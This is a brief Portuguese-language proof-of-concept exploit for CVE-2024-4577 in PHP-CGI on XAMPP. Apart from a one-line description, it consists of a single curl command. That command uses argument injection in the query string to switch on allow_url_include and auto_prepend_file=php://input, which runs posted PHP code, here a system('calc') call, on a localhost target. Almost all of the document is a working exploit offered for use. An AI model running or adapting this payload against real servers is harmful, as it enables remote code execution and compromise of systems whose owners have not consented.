
Exploit de prova de conceito para CVE-2024-4577 visando XAMPP PHP-CGI com execução remota de código via injeção de argumentos.
curl -v -d "<?php system('calc'); ?>" http://127.0.0.1/php-cgi/php-cgi.exe/?%add+allow_url_include%3Don+-d+auto_prepend_file%3Dphp%3A//input+-d+cgi.force_redirect%3D0